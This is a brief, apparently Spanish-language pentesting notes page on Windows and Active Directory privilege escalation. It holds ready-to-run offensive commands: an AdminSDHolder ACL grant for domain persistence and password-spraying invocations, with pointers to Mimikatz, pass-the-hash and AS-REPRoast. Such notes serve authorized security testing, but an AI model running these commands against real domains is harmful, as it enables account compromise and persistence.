Comment on page

Local Privilege Escalation

Analizar:
Los servicios que se encuentran instalados (cuáles son sus versiones), que se ejecutan en el equipo, que tiene el usuario del equipo...
Historial de Powershell
Pertenencia a grupos con privilegios --> conseguir shell como Local Admin
​
Probar:
AdminSDHolder -https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/adminsdholder​
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=Security,DC=local' -PrincipalIdentity Moe -Rights All -verbose
password spraying -https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1​
Invoke-DomainPasswordSpray -Password pass
Invoke-DomainPasswordSpray -PasswordList .\\Passwords.txt -Domain <Domain>
​
​
​
​
​
​
​

Mimikatz & PassTheHash

PE - AS-REPRoast

Last modified 1yr ago